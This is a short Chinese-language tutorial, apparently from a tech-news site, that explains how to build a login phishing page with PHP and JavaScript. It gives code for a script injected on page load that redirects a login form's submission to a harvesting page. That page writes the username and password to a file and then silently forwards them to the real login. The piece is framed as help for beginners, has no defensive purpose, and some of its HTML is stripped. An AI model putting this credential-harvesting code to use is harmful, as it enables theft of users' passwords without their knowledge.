如何使用PHP和JS实现模仿登录钓鱼
发布时间:2020-07-16 11:55:37
来源:亿速云
阅读:67
作者:Leah
如何使用PHP和JS实现模仿登录钓鱼?很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
目录介绍
login.php 正常登录的文件
selfLogin.php 自定义的登录文件
data.txt 记录用户输入的数据
login.php<?php
echo "
";
$userInfo = $_POST ;
if ($userInfo) {
# code...
var_dump($userInfo,'登录成功') ;exit();
}
?>
登录用户姓名:
用户密码:
//js劫持代码
window.onload = function (eve) {
var form = document.getElementById('login');
form.innerHTML = '
用户姓名: 用户密码: ' ;//钓鱼地址
form.action = "selfLogin.php" ;
}
selfLogin.php<?php
$name = '' ;
$pwd = '' ;
//var_dump('数据被截取了',$_POST) ;
if($_POST) {
//记录获取的数据信息
$name = $_POST['name'] ;
$pwd = $_POST['pwd'] ;
file_put_contents('data.txt', json_encode($_POST,true)) ;
}
?>
//构建之前的页面
window.onload = function (eve) {
var name = '<?php echo $name; ?>' ;
var pwd = '<?php echo $pwd; ?>' ;
if(name && pwd) {
var p = document.createElement('p');
document.body.appendChild(p);
p.innerHTML ='
'+' 用户姓名: 用户密码: ' ;
document.getElementById('login2').submit();
}
}
data.txt{"name":"admin","pwd":"123456"}
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。